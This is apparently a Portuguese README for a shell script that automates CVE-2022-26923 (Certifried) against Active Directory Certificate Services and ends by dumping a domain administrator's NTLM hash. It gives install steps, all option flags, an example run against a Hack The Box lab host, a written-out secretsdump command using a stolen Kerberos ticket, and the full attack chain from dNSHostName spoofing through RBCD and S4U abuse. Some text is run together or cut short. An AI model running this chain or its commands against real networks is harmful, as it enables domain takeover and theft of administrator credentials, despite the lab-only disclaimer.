
Exploração de CVE-2022-26923
Automação da exploração da CVE-2022-26923 (Certifried) permitindo elevação de privilégios via abuso do Active Directory Certificate Services (AD CS) e Resource-Based Constrained Delegation (RBCD), levando ao dump do hash NTLM de uma conta de administrador de domínio.
⚠️ Uso pedagógico apenas / Lab / HTB
Não usar em ambiente não autorizado.
Este script automatiza a cadeia de ataque a seguir:
dNSHostNameadministratorsecretsdump.pycertipy-adbloodyADgetST.py (Impacket)secretsdump.py (Impacket)opensslpipx install impacket
pipx install certipy-ad
pipx install bloodyad
sudo apt install openssl
chmod +x CVE-2022-26923.sh
./CVE-2022-26923.sh [opções]
-d, --dc-ip IP do Controlador de Domínio
-D, --domain Nome do domínio
-u, --user Usuário válido
-p, --pass Senha do usuário
-c, --comp-name Nome da máquina controlada
-C, --comp-pass Senha da máquina
-a, --ca-name Nome da Autoridade Certificadora
-t, --template Template do certificado
-f, --pfx-file Nome do arquivo PFX
-H, --dc-hostname Hostname do DC
-A, --dc-account Conta do DC
-i, --impersonate Conta alvo a impersonar
--verbose Modo debug
-h, --help Ajuda
./CVE-2022-26923.sh \
-d 10.129.1.39 \
-D certifried.htb \
-u [email protected] \
-p 'Ch4ng3m3!' \
--verbose
Ao final da execução:
administrator.ccacheadministratorEm caso de problema com Kerberos:
KRB5CCNAME=/tmp/administrator.ccache secretsdump.py \
-just-dc-ntlm -just-dc-user administrator \
certifried.htb/[email protected] \
-k -no-pass -dc-ip 10.129.1.39
Machine Account Creation
↓
dNSHostName spoofing
↓
Certificate Request (Machine Template)
↓
Authentication via PFX
↓
RBCD abuse (bloodyAD)
↓
S4U2Self + S4U2Proxy
↓
Kerberos Ticket extraction
↓
NTLM dump via secretsdump
Este projeto é fornecido para fins:
O autor se isenta de qualquer responsabilidade em caso de uso não autorizado.
MIT